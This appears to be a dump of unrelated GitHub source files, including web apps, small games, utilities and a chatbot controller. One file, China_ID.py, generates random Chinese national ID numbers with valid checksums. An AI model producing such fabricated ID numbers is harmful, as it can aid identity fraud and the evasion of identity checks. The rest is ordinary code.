st\nfrom neuralnetwork.main import predict, init, charts\n\ndef load_view():\n stocks = [row[0] for row in dataBase.get_Currency()]\n\n buff, col, buff2 = st.columns([1, 2, 1])\n\n form = col.form(key='crypto_select')\n ticker = form.selectbox('Выберите пару криптовалюты для предсказания', stocks)\n DAYS_TO_PREDICT = form.slider('Период предсказания: ', 1, 15)\n submit_button = form.form_submit_button(label='Рассчитать')\n\n if submit_button:\n\n init()\n total_price, daily_price, predicted_cases, train, epochs = predict(ticker, DAYS_TO_PREDICT)\n charts(ticker, total_price, daily_price, predicted_cases, train, epochs)\n\n buff, col, buff2 = st.columns([1, 2, 1])\n col.write(predicted_cases)\n\n","repo_name":"Rehby/CryptoProject","sub_path":"pages/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5794732017","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'activities'\nurlpatterns = [\n path('activities/', views.activities, name='activities'),\n path('add_activity/', views.add_activity, name=\"add_activity\"),\n path('update_activity//', views.update_activity, name=\"update_activity\"),\n path('delete_activity//', views.delete_activity, name=\"delete_activity\"),\n]\n","repo_name":"howa3204/kanaboard-app","sub_path":"activities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73132137118","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nlog = logging.getLogger(__name__)\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\n# Standard library imports\nimport re\n\n# External imports\n\n# Bokeh imports\n\n#-----------------------------------------------------------------------------\n# Globals and constants\n#-----------------------------------------------------------------------------\n\n__all__ = (\n 'decode_utf8',\n 'encode_utf8',\n 'escape',\n 'format_docstring',\n 'indent',\n 'nice_join',\n 'snakify',\n)\n\n#-----------------------------------------------------------------------------\n# General API\n#-----------------------------------------------------------------------------\n\ndef encode_utf8(u):\n ''' Encode a UTF-8 string to a sequence of bytes.\n\n Args:\n u (str) : the string to encode\n\n Returns:\n bytes\n\n '''\n import sys\n if sys.version_info[0] == 2:\n u = u.encode('utf-8')\n return u\n\ndef decode_utf8(u):\n ''' Decode a sequence of bytes to a UTF-8 string\n\n Args:\n u (str) : the bytes to decode\n\n Returns:\n UTF-8 string\n\n '''\n import sys\n if sys.version_info[0] == 2:\n u = u.decode('utf-8')\n return u\n\n# based on `html` stdlib module (3.2+)\ndef escape(s, quote=(\"'\", '\"')):\n ''' Perform HTML-safe escaping.\n\n Replaces special characters \"&\", \"<\" and \">\" to HTML-safe sequences, and\n optionally translates quote characters.\n\n Args:\n s (str): a string to escape\n\n quote (seq[str], optional) : which quote characters to replace\n (default: (\"'\", '\"'))\n\n Returns:\n str\n\n '''\n s = s.replace(\"&\", \"&\")\n s = s.replace(\"<\", \"<\")\n s = s.replace(\">\", \">\")\n if quote:\n if '\"' in quote:\n s = s.replace('\"', \""\")\n if \"'\" in quote:\n s = s.replace(\"'\", \"'\")\n return s\n\ndef indent(text, n=2, ch=\" \"):\n ''' Indent all the lines in a given block of text by a specified amount.\n\n Args:\n text (str) :\n The text to indent\n\n n (int, optional) :\n The amount to indent each line by (default: 2)\n\n ch (char, optional) :\n What character to fill the indentation with (default: \" \")\n\n '''\n padding = ch * n\n return \"\\n\".join(padding+line for line in text.split(\"\\n\"))\n\ndef nice_join(seq, sep=\", \", conjuction=\"or\"):\n ''' Join together sequences of strings into English-friendly phrases using\n the conjunction ``or`` when appropriate.\n\n Args:\n seq (seq[str]) : a sequence of strings to nicely join\n sep (str, optional) : a sequence delimiter to use (default: \", \")\n conjunction (str or None, optional) : a conjuction to use for the last\n two items, or None to reproduce basic join behaviour (default: \"or\")\n\n Returns:\n a joined string\n\n Examples:\n >>> nice_join([\"a\", \"b\", \"c\"])\n 'a, b or c'\n\n '''\n seq = [str(x) for x in seq]\n\n if len(seq) <= 1 or conjuction is None:\n return sep.join(seq)\n else:\n return \"%s %s %s\" % (sep.join(seq[:-1]), conjuction, seq[-1])\n\ndef snakify(name, sep='_'):\n ''' Convert CamelCase to snake_case. '''\n name = re.sub(\"([A-Z]+)([A-Z][a-z])\", r\"\\1%s\\2\" % sep, name)\n name = re.sub(\"([a-z\\\\d])([A-Z])\", r\"\\1%s\\2\" % sep, name)\n return name.lower()\n\ndef format_docstring(docstring, *args, **kwargs):\n ''' Safely format docstrings.\n\n When Python is executed with the ``-OO`` option, doc strings are removed and\n replaced the value ``None``. This function guards against applying the string\n formatting options in that case.\n\n Args:\n docstring (str or None) : The docstring to format, or ``None``\n args (tuple) : string formatting arguments for the docsring\n kwargs (dict) : string formatting arguments for the docsring\n\n Returns:\n str or None\n\n '''\n return None if docstring is None else docstring.format(*args, **kwargs)\n\n#-----------------------------------------------------------------------------\n# Dev API\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Private API\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Code\n#-----------------------------------------------------------------------------\n","repo_name":"holzschu/Carnets","sub_path":"Library/lib/python3.7/site-packages/bokeh-1.4.0-py3.7.egg/bokeh/util/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","stars":510,"dataset":"github-code","pt":"51"} +{"seq_id":"34530070645","text":"from deck_of_cards.classes import deck\n\nbicycle = Deck()\n\n# bicycle.show_cards()\n\ndef black_jack(dealer):\n dealer=[]\n player=[]\n player_score= dealer[0]+ dealer[1]\n dealer_score=0\n print('welcome to Black Jack')\n\ndef dealer(deck):\n sel","repo_name":"merazkevin/python_2","sub_path":"introduction/deck_of_cards/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73847537439","text":"from sys import stdin\n\ndef isLower(guess):\n\tisGuessLower = True\n\n\tfor lowGuess in lowGuesses:\n\t\tif (lowGuess >= guess):\n\t\t\tisGuessLower = False\n\t\n\treturn isGuessLower\n\ndef isHigher(guess):\n\tisGuessHigher = True\n\n\tfor highGuess in highGuesses:\n\t\tif (highGuess <= guess):\n\t\t\tisGuessHigher = False\n\t\n\treturn isGuessHigher\n\nlowGuesses = []\nhighGuesses = []\n\nwhile True:\n\tguess = int(stdin.readline())\n\tif (guess == 0):\n\t\tbreak\n\n\tresponse = str(stdin.readline()).strip()\n\n\tif response == 'too low':\n\t\tlowGuesses.append(guess)\n\telif response == 'too high':\n\t\thighGuesses.append(guess)\n\telif response == 'right on':\n\t\tif isLower(guess) and isHigher(guess):\n\t\t\tprint('Stan may be honest')\n\t\telse:\n\t\t\tprint('Stan is dishonest')\n\t\t\n\t\tlowGuesses = []\n\t\thighGuesses = []","repo_name":"iago-mendes/competitive-programming","sub_path":"guessinggame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33990475475","text":"# from threading import Thread,Timer,current_thread\n#\n# def task():\n# t = Timer(interval=5,function=task)\n# t.start()\n# print('hello world,thread name is %s'%current_thread().getName())\n#\n# if __name__ == '__main__':\n# task()\n\nimport random,string\nfrom threading import Thread,Timer\n\nclass Input_Code():\n def refresh_code(self):\n t = Timer(interval=5,function=self.refresh_code)\n t.start()\n self.code = ''.join(random.sample(string.ascii_lowercase+string.ascii_uppercase,4))\n\n def check_code(self):\n while True:\n print(self.code)\n msg = input('>>>:')\n if msg==self.code:\n print('success')\n else:\n print('fail')\n\nif __name__ == '__main__':\n i = Input_Code()\n i.refresh_code()\n i.check_code()","repo_name":"music51555/wxPythonCode","sub_path":"m4/socket_correlation/my_review/Timer_test.py","file_name":"Timer_test.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"851464280","text":"from header import *\n\n# script_shuffle_troop_slots:\n\t\t# Shuffles a range of slots of a given troop.\n\t\t# Used for exploiting a troop as an array.\n\t\t# Input: arg1 = troop_no, arg2 = slot_begin, arg3 = slot_end\nshuffle_troop_slots\t= (\n\t\"shuffle_troop_slots\",\n\t\t\t[\n\t\t\t\t(store_script_param, \":troop_no\", 1),\n\t\t\t\t(store_script_param, \":slots_begin\", 2),\n\t\t\t\t(store_script_param, \":slots_end\", 3),\n\t\t\t\t(try_for_range, \":cur_slot_no\", \":slots_begin\", \":slots_end\"),\n\t\t\t\t\t(store_random_in_range, \":random_slot_no\", \":slots_begin\", \":slots_end\"), #reg(58) = random slot. Now exchange slots reg(57) and reg(58)\n\t\t\t\t\t(troop_get_slot, \":cur_slot_value\", \":troop_no\", \":cur_slot_no\"), #temporarily store the value in slot reg(57) in reg(59)\n\t\t\t\t\t(troop_get_slot, \":random_slot_value\", \":troop_no\", \":random_slot_no\"), #temporarily store the value in slot reg(58) in reg(60)\n\t\t\t\t\t(troop_set_slot, \":troop_no\", \":cur_slot_no\", \":random_slot_value\"), # Now exchange the two...\n\t\t\t\t\t(troop_set_slot, \":troop_no\", \":random_slot_no\", \":cur_slot_value\"),\n\t\t\t\t(try_end),\n\t\t])","repo_name":"admiralnelson/modded_modded_1257ad","sub_path":"script/procedures/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14800241391","text":"'''\nHero's world! bate 0.1\nMaroonlk\n2018-06-25\n'''\nimport time\nimport random\n\n\n# 设置地图\nclass GameMap(object):\n map_size = None\n def __init__(self, size=[4, 5]):\n self.size = size\n self.map = [[x, y] for x in range(0, size[0]) for y in range(0, size[1])]\n GameMap.map_size = size\n\n # 打印地图\n def pri_Map(self, wei_zhi=None):\n for x, y in self.map:\n if wei_zhi == [x, y]:\n print(\"O\", end='')\n else:\n print(\"-\", end='')\n if y == self.size[1] - 1:\n print(\"\")\n\n\n\n# map1.pri_Map([1, 1])\n# print(\"=\" * 20)\n# map1.pri_Map([2, 2])\n\n\n# 设置玩家类\nclass User(object):\n def __init__(self, name='Player01', gong_ji=5, xue_liang=100, fang_yu=0, wei_zhi=[0, 0]):\n self.name = name\n self._gong_ji_li = gong_ji\n self._xue_liang = xue_liang\n self._fang_yu = fang_yu\n self._wei_zhi = wei_zhi\n self.ji_neng = {\n \"1\":self._gong_ji_li * random.choice([1,1,1,1.5])\n }\n # 受伤害\n\n\n\n # 移动并且限制玩家无法在地图边缘移动溢出\n def move_User(self, fang_xiang):\n if fang_xiang == 'a' and self._wei_zhi[1] != 0:\n self._wei_zhi[1] -= 1\n if fang_xiang == 'd' and self._wei_zhi[1] != GameMap.map_size[1]-1:\n self._wei_zhi[1] += 1\n if fang_xiang == 'w' and self._wei_zhi[0] != 0:\n self._wei_zhi[0] -= 1\n if fang_xiang == 's' and self._wei_zhi[0] != GameMap.map_size[0]-1:\n self._wei_zhi[0] += 1\n\n#设置怪物类\nclass GuaiWu(object):\n def __init__(self, name, gong_ji, xue_liang, fang_yu, wei_zhi=None):\n self.name = name\n self.gong_ji = gong_ji\n self.xue_liang = xue_liang\n self.fang_yu = fang_yu\n self.wei_zhi = wei_zhi\n self.ji_neng = {\n '1':self.gong_ji * random.choice((1,1,1,1.5))\n }\n\n def shou_Shang(self, who, value):\n self.xue_liang -= (value - self.fang_yu/2)\n\n if self.xue_liang > 0:\n pass\n\n\nslm = GuaiWu(\"史莱姆\", gong_ji=3, xue_liang=10, fang_yu=1)\n\n\n\n\nif __name__ == '__main__':\n print(\"欢迎来到《英雄无敌》的世界!\")\n\n print(\"开始游戏... ... 载入中... ...\")\n time.sleep(0.5)\n print(\"请输入你的角色名(可以为空)\\r\\n\")\n name = input(\"角色名:\")\n\n if name == '': #检测是否空ID\n p1 = User()\n else:\n p1 = User(name)\n\n print(\"\\r\\n游戏开始!你的角色名为:{0}\\r\\n\".format(p1.name))\n print(\"你所在的地图将会是是这样的:\")\n map1 = GameMap([4, 5])\n map1.pri_Map(p1._wei_zhi)\n print(\"当你走到右下角时,你就胜利了!\\r\\n\")\n print(\"你可以输入adsw来移动你的角色\")\n\n #随机怪物刷新的坐标\n guai_wu_list = random.sample(map1.map, random.choice(range(0, GameMap.map_size[0] * GameMap.map_size[1])))\n\n def gong_ji(fa_dong, bei_dong, shang_hai):\n print(\" |{0}| 发动了攻击,对 |{1}| 造成了 |{2}| 点伤害!\".format(fa_dong, bei_dong, shang_hai))\n p1._xue_liang -= fa_dong.gong_ji - bei_dong._fang_yu / 2\n\n print(\" |{0}| 剩余血量: |{1}| \".format(bei_dong, bei_dong._xue_liang))\n\n while True:\n keyworld = input(\"移动:\")\n p1.move_User(keyworld)\n map1.pri_Map(p1._wei_zhi)\n\n\n if p1._wei_zhi != [0, 0]:\n if p1._wei_zhi in guai_wu_list:\n print(\"##遭遇{0}! 准备战斗!\".format(slm.name))\n while True:\n a = input(\"攻击:请输入|1|使用普通攻击:\")\n\n if a == '1':\n gong_ji(p1.name, slm, p1._gong_ji_li)\n\n\n\n\n if p1._wei_zhi == [GameMap.map_size[0]-1, GameMap.map_size[1]-1]:\n print(\"~~~~~~你赢了!!~~~~~\")\n break","repo_name":"Maroonlk/untitled2","sub_path":"游戏/英雄无敌/game_main.py","file_name":"game_main.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32620270133","text":"import requests\nfrom lxml import etree\nimport time\nimport json\nimport random\nimport datetime\n\njs = json.loads(open('./china_id.json','r').read())\n\ndef get(l):\n \"\"\"\n 获取数据库没有的区号*免责声明:仅供学习参考禁止违法犯罪\n \"\"\"\n try:\n html = requests.get('http://www.stl56.com/idcard/'+str(l)+'.html').text\n except Exception as e:\n print(e)\n return ''\n else:\n html = etree.HTML(html)\n xpath = html.xpath('/html/body/div[2]/div[1]/div[2]/div[2]/h2')\n if len(xpath) != 0:\n return xpath[0].text\n else:\n return ''\n\ndef id_chenk_X(s_id: str) -> str:\n \"\"\"\n 获取身份证校验位*免责声明:仅供学习参考禁止违法犯罪\n \"\"\"\n if len(s_id) == 18:\n s = s_id[:17]\n elif len(s_id) == 17:\n s = s_id\n else:\n return False\n x = ['1','0','X','9','8','7','6','5','4','3','2']\n val = 0\n for i in range(17,0,-1):\n # print(s[17 - i])\n val += (pow(2,i) % 11) * int(s[17 - i])\n return x[val % 11]\n\ndef chenk_id(s_id: str) -> bool:\n \"\"\"\n 检查身份证是否合法*免责声明:仅供学习参考禁止违法犯罪\n \"\"\"\n if len(s_id) != 18:\n return False\n return id_chenk_X(s_id) == s_id[17]\n\ndef id_analysis(s_id: str) -> dict:\n \"\"\"\n 取身份证信息*免责声明:仅供学习参考禁止违法犯罪\n \"\"\"\n if not chenk_id(s_id):\n return False\n s = js.get(s_id[0:2] + '0000','')\n shi = js.get(s_id[0:4] + '00','')\n qu = js.get(s_id[0:6],'')\n if s == '':\n region = get(s_id[0:6])\n elif shi == '':\n region = get(s_id[0:6])\n elif qu == '':\n region = get(s_id[0:6])\n else:\n region = s + shi + qu\n if (int(s_id[16]) % 2) == 1:\n gender = 'boy'\n else:\n gender = 'girl'\n return {'status':region != '','id':s_id,'region':region,'gender':gender,'birthday':s_id[6:14]}\n\ndef rand_id(year: int) -> str:\n \"\"\"\n 生成指定岁数随机身份证*免责声明:仅供学习参考禁止违法犯罪\n \"\"\"\n rand = random.randint(0,len(js))\n n = 0\n for i in js:\n if n == rand:\n rand = str(random.randint(100,999))\n stime = str(datetime.datetime.now().year - year) + str(datetime.datetime.now().month) + str(datetime.datetime.now().day)\n return i + stime + rand + id_chenk_X(i + stime + rand)\n n += 1\n\n# print(id_analysis(rand_id(18)))\n","repo_name":"577fkj/China-ID-Card","sub_path":"China_ID.py","file_name":"China_ID.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19905363660","text":"from typing import Dict, Callable\r\n\r\nfrom TMTChatbot.Common.storage.base_storage import BaseStorage\r\nfrom TMTChatbot.Common.default_intents import *\r\nfrom TMTChatbot.Common.common_keys import *\r\nfrom TMTChatbot.AlgoClients.weather_service import WeatherService\r\nfrom TMTChatbot.Schema.common.billing_method import ShipMethod, PaymentMethod\r\nfrom TMTChatbot.ServiceWrapper.services.base_service import BaseServiceSingleton\r\nfrom TMTChatbot.StateController.services.information_extractor import BaseInformationExtractor\r\nfrom TMTChatbot.StateController.services.shop_manager import ShopManager\r\nfrom TMTChatbot.StateController.services.user_manager import UserManager\r\nfrom TMTChatbot.StateController.services.value_mapping import ValueMapping\r\nfrom TMTChatbot.StateController.services.bot_intent import BotIntent\r\nfrom TMTChatbot.StateController.services.billing_service import BillingManager\r\nfrom TMTChatbot.StateController.services.multiple_choice_manager import MultipleChoiceManager\r\nfrom TMTChatbot.StateController.services.qa_service import QAService\r\nfrom TMTChatbot.StateController.config.config import Config\r\nfrom TMTChatbot.StateController.services.product_search_manager import ProductSearchManager\r\nfrom TMTChatbot.StateController.services.recommendation_manager import RecommendationManager\r\nfrom TMTChatbot.StateController.services.size_consultant_manager import SizeConsultantManager\r\nfrom TMTChatbot.Schema.objects.conversation import Conversation\r\n\r\n\r\nclass ActionManager(BaseServiceSingleton):\r\n def __init__(self, storage: BaseStorage, config: Config):\r\n super(ActionManager, self).__init__(config=config)\r\n self.information_extractor = BaseInformationExtractor(config=config, storage=storage)\r\n self.bot_intent_extractor = BotIntent(config=config, storage=storage)\r\n self.value_mapper = ValueMapping(config=config, storage=storage)\r\n self.billing_manager = BillingManager(config=config, storage=storage)\r\n self.user_manager = UserManager(config=config, storage=storage)\r\n self.shop_manager = ShopManager(config=config, storage=storage)\r\n self.multiple_choice_manager = MultipleChoiceManager(config=config, storage=storage)\r\n self.product_search_manager = ProductSearchManager(config=config, storage=storage)\r\n self.recommendation_manager = RecommendationManager(config=config, storage=storage)\r\n self.size_consultant_manager = SizeConsultantManager(config=config, storage=storage)\r\n self.qa_services = QAService(config=config, storage=storage)\r\n self.weather_services = WeatherService(config=config, storage=storage)\r\n self.actions: Dict[str, Callable[[Conversation], ...]] = {\r\n BOT_CHECK_PRODUCT_HAS_DISCOUNT: self.billing_manager.check_product_discount,\r\n\r\n BOT_ADD_MULTIPLE_VALUE_CHOICE_CANDIDATES: self.multiple_choice_manager.add_multiple_value_choices,\r\n BOT_PROCESS_MULTIPLE_CHOICES: self.multiple_choice_manager.process_state,\r\n BOT_DROP_MULTIPLE_CHOICES: self.multiple_choice_manager.drop_multiple_choices,\r\n BOT_REFRESH_MULTIPLE_CHOICES: self.multiple_choice_manager.refresh_multiple_choices,\r\n BOT_ADD_OBJECT_RECOMMENDATIONS: self.recommendation_manager.add_product_recommendations,\r\n BOT_ADD_MULTIPLE_OBJECT_CHOICE_RECOMMENDATIONS: self.recommendation_manager.add_product_multiple_choices,\r\n BOT_UPDATE_USER_ATTRIBUTE_STATUS: self.user_manager.update_user_attribute_status(False),\r\n # BOT_CHECK_USER_MULTI_VALUE: self.user_manager.check_user_multi_value(False),\r\n BOT_CHECK_SHOP_MULTI_VALUE: self.shop_manager.check_shop_multi_value(False),\r\n\r\n BOT_CHECK_BILL_PRODUCT_UNIQUE: self.multiple_choice_manager.unique_bill_object(False),\r\n BOT_ADD_BILL_PRODUCT: self.billing_manager.add_billing_product,\r\n BOT_ADD_CARE_PRODUCT: self.billing_manager.add_care_product,\r\n BOT_ADD_PAYMENT_BANK_ACCOUNT_RECOMMENDATIONS: self.billing_manager.add_payment_bank_account_recommendations,\r\n BOT_ADD_BILL_PAYMENT_BANK_ACCOUNT: self.billing_manager.add_bill_payment_bank_account,\r\n BOT_CANCEL_PRODUCT: self.billing_manager.cancel_product,\r\n BOT_CONFIRM_BILL: self.billing_manager.confirm_bill,\r\n BOT_PROCESS_BILL: self.billing_manager.process_bill,\r\n BOT_CHECK_BILL_INFOR: self.billing_manager.check_bill_infor,\r\n BOT_UPDATE_BILL_ADDRESS: self.billing_manager.update_bill_info(BILL_ADDRESS),\r\n BOT_UPDATE_BILL_PHONE_NUMBER: self.billing_manager.update_bill_info(BILL_PHONE_NUMBER),\r\n BOT_UPDATE_PENDING_PAYMENT: self.billing_manager.update_pending_payment,\r\n BOT_CHECK_USER_SEND_PAYMENT: self.billing_manager.bill_image_service,\r\n\r\n BOT_ANSWER_PRODUCT_QUESTION: self.qa_services.answer_user_product_question,\r\n BOT_ANSWER_PRODUCT_QUESTION_WITH_INTENT: self.qa_services.answer_user_product_question_with_intent,\r\n\r\n BOT_PRODUCT_IMAGE_SEARCH_MODEL: self.product_search_manager.node_product_image_search,\r\n BOT_UPDATE_WEATHER_INFOR: self.weather_services.update_weather_infor,\r\n\r\n BOT_CHECK_BILL_PRODUCT_TO_CANCEL: self.billing_manager.check_bill_product_to_cancel,\r\n BOT_ADD_DROP_PRODUCT_CHOICES: self.multiple_choice_manager.add_drop_product_choices,\r\n\r\n BOT_ADD_PHONE_NUMBER_CHOICES: self.multiple_choice_manager.add_infor_multiple_choices(BILL_PHONE_NUMBER,\r\n CONV_USER),\r\n BOT_ADD_ADDRESS_CHOICES: self.multiple_choice_manager.add_infor_multiple_choices(BILL_ADDRESS, CONV_USER),\r\n BOT_UPDATE_USER_INFOR: self.user_manager.update_user_infor_multiple_choices,\r\n BOT_UPDATE_SHOP_INFOR_MULTIPLE_CHOICES: self.shop_manager.update_shop_infor_multiple_choices,\r\n\r\n BOT_REMOVE_BILL_RECEIVE_SHOWROOM: self.billing_manager.remove_bill_attribute(BILL_RECEIVE_SHOWROOM),\r\n BOT_REMOVE_BILL_PAYMENT_METHOD: self.billing_manager.remove_bill_attribute(BILL_PAYMENT_METHOD),\r\n BOT_UPDATE_BILL_RECEIVE_TIME: self.billing_manager.update_bill_info(BILL_RECEIVE_TIME),\r\n BOT_UPDATE_BILL_RECEIVE_SHOWROOM: self.billing_manager.update_bill_info(BILL_RECEIVE_SHOWROOM),\r\n BOT_ADD_SHOWROOM_CHOICES: self.multiple_choice_manager.add_infor_multiple_choices(SHOWROOM, CONV_SHOP),\r\n BOT_CHECK_USER_SIZE: self.size_consultant_manager.check_user_size(False),\r\n BOT_PREDICT_USER_SIZE: self.size_consultant_manager.predict_size,\r\n BOT_UPDATE_USER_SIZE: self.size_consultant_manager.update_user_size,\r\n BOT_UPDATE_BILL_PRODUCT_SIZE: self.billing_manager.update_bill_product_attr(PRODUCT_SIZE),\r\n BOT_CHECK_USER_SIZE_REMAIN: self.size_consultant_manager.check_user_size_remain,\r\n BOT_CHECK_MENTIONED_SIZE_IN_TABLE: self.size_consultant_manager.check_mentioned_size_in_table,\r\n\r\n BOT_UPDATE_BILL_PAYMENT: self.billing_manager.update_bill_info(BILL_PAYMENT),\r\n BOT_REMOVE_BILL_PAYMENT: self.billing_manager.remove_bill_attribute(BILL_PAYMENT),\r\n\r\n # NOTE: State - Check Order Status\r\n BOT_GET_CHOSEN_BILL: self.billing_manager.get_chosen_bill,\r\n BOT_ADD_BILLS_TO_CHECK_ORDER_STATUS: self.billing_manager.add_bills_to_check_order_status,\r\n BOT_CHECK_NUMBER_OF_PROCESSING_BILLS: self.billing_manager.check_number_of_processing_bills,\r\n BOT_DROP_BILLS_AFTER_CHECK_ORDER_STATUS: self.billing_manager.drop_bills_after_check_order_status,\r\n\r\n BOT_CHECK_USER_HISTORY_BILL: self.user_manager.check_user_history_bill,\r\n BOT_FORWARD_TO_ADMIN: self.shop_manager.forward_to_admin\r\n }\r\n self.add_update_bill_receive_method()\r\n self.add_update_bill_payment_method()\r\n\r\n def add_update_bill_receive_method(self):\r\n [self.add_action(action_name=f\"{BASE_BOT_UPDATE_BILL_RECEIVE_METHOD}_{ship_method}\",\r\n action_function=self.billing_manager.update_bill_infor_with_value(BILL_RECEIVE_METHOD,\r\n ship_method))\r\n for ship_method in ShipMethod.keys()]\r\n\r\n def add_update_bill_payment_method(self):\r\n [self.add_action(action_name=f\"{BASE_BOT_UPDATE_BILL_PAYMENT_METHOD}_{payment_method}\",\r\n action_function=self.billing_manager.update_bill_infor_with_value(BILL_PAYMENT_METHOD,\r\n payment_method))\r\n for payment_method in PaymentMethod.keys()]\r\n\r\n def add_action(self, action_name, action_function):\r\n if action_name in self.actions:\r\n raise ValueError(f\"{action_name} already exist. Please use different action_name\")\r\n self.actions[action_name] = action_function\r\n\r\n def map_bot_expectation(self, conversation: Conversation):\r\n self.information_extractor.map_bot_expectation(conversation)\r\n\r\n def default_global_actions(self, conversation: Conversation):\r\n pass\r\n\r\n def default_pre_actions(self, conversation: Conversation, is_new_action: bool = False,\r\n mapping_info_only: bool = False):\r\n \"\"\"\r\n Some task must be done in every conversation turn to extract basic information from users\r\n :param conversation:\r\n :param is_new_action:\r\n :param mapping_info_only:\r\n :return:\r\n \"\"\"\r\n if mapping_info_only:\r\n self.information_extractor.mapping_info(conversation)\r\n else:\r\n self.information_extractor.information_extraction(conversation, is_new_action)\r\n self.information_extractor.mapping_info(conversation, is_new_action)\r\n self.bot_intent_extractor.extract_state_based_intents(conversation)\r\n\r\n def make_pre_actions(self, conversation: Conversation, is_new_action: bool = False,\r\n mapping_info_only: bool = False):\r\n \"\"\"\r\n Looking for action in PRE ACTIONS to execute the appropriate function\r\n :param conversation:\r\n :param is_new_action:\r\n :param mapping_info_only:\r\n :return:\r\n \"\"\"\r\n self.default_pre_actions(conversation=conversation, is_new_action=is_new_action,\r\n mapping_info_only=mapping_info_only)\r\n current_action = conversation.current_action\r\n if current_action is not None:\r\n for pre_action in current_action.pre_actions.values():\r\n if pre_action.tag in self.actions:\r\n func = self.actions[pre_action.tag]\r\n func(conversation)\r\n else:\r\n self.logger.warning(f\"Func {pre_action.tag} not Implemented\")\r\n\r\n def make_post_actions(self, conversation: Conversation):\r\n \"\"\"\r\n Looking for action in POST ACTIONS to execute the appropriate function\r\n :param conversation:\r\n :return:\r\n \"\"\"\r\n current_action = conversation.current_action\r\n if current_action is not None:\r\n for post_action in current_action.post_actions.values():\r\n if post_action.tag in self.actions:\r\n func = self.actions[post_action.tag]\r\n func(conversation)\r\n else:\r\n self.logger.warning(f\"Func {post_action.tag} not Implemented\")\r\n\r\n def make_current_action(self, conversation: Conversation):\r\n \"\"\"\r\n Looking for action in CURRENT DONE BRANCH to execute the appropriate function\r\n :param conversation:\r\n :return:\r\n \"\"\"\r\n current_action = conversation.current_action\r\n if current_action is not None:\r\n current_branch = current_action.current_branch\r\n if current_branch is not None:\r\n self.logger.debug(f\"POST ACTIONS {current_action.name, current_branch.post_actions.values()}\")\r\n for current_action in current_branch.post_actions.values():\r\n if current_action.tag in self.actions:\r\n func = self.actions[current_action.tag]\r\n func(conversation)\r\n else:\r\n self.logger.warning(f\"Func {current_action.tag} not Implemented\")\r\n","repo_name":"ToDuyHung/API-Manager","sub_path":"Common/TMTChatbot/StateController/services/action_manager.py","file_name":"action_manager.py","file_ext":"py","file_size_in_byte":12489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35975593209","text":"import albumentations as A\nimport cv2, glob, os\n\nfilelist = glob.glob(\"*\")\n\nnumber = 0 # 3은 transform1 변경 -> 끝나고 다시 변경\n\ntransform = A.Compose([\n A.Rotate(limit=[90*(number+1),90*(number+1)],rotate_method=\"largest_box\",border_mode=cv2.BORDER_CONSTANT,p=1)\n ], bbox_params = A.BboxParams(format=\"yolo\"))\n\ntransform1 = A.Compose([\n A.RandomBrightnessContrast(brightness_limit=(-0.2, 0.2), contrast_limit=(-0.2, 0.2), p=1),\n A.CLAHE(p=1),\n A.OpticalDistortion(p=0.5),\n A.RandomRotate90(p=0.5),\n A.GaussNoise(p=0.5, var_limit=(100, 200))\n ], bbox_params = A.BboxParams(format=\"yolo\"))\n\ntransform2 = A.Compose([\n A.PadIfNeeded(2000,2000,border_mode=cv2.BORDER_REPLICATE, p=1)\n\n ], bbox_params = A.BboxParams(format=\"yolo\"))\n\ndef savefig(file):\n boxes = []\n image = cv2.imread(file)\n\n filename, _ = os.path.splitext(file)\n\n with open(f'./cooTXT/{filename}.txt','r') as txt:\n for line in txt.readlines():\n cls,center_x,center_y,width,height = list(map(float,line.strip().split(\" \")))\n\n x_min = center_x - width/2; x_max = center_x + width/2\n y_min = center_y - height/2; y_max = center_y + height/2\n\n if x_min < 0:\n width = center_x*2\n \n elif x_max > 1:\n width = (1 - center_x)*2\n\n if y_min < 0:\n height = center_y*2\n\n elif y_max > 1:\n height = (1 - center_y)*2\n\n axis = [center_x,center_y,width,height,cls]\n boxes.append(axis)\n\n transformed = transform2(image=image,bboxes=boxes)\n transformed_image = transformed['image']\n transformed_bboxes = transformed['bboxes']\n\n cv2.imwrite(f\"./trash/{number}{file}\",transformed_image)\n\n f = open(f\"./trash/cooTXT/{number}{filename}.txt\",'w')\n\n for box in transformed_bboxes:\n f.write(f\"{int(box[-1])} {box[0]} {box[1]} {box[2]} {box[3]}\\n\")\n f.close()\n\nfor file in filelist:\n if os.path.isdir(file):\n continue\n\n savefig(file)","repo_name":"KongTi/CheckingCircle","sub_path":"augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72930476959","text":"\"\"\"\nFunctions for VSCode-Anywhere\n\"\"\"\n\nimport salt.utils.platform\nimport salt.utils.files\nimport salt.exceptions\nimport os\nimport re\n\n\ndef __virtual__():\n \"\"\"\n Load the module\n \"\"\"\n 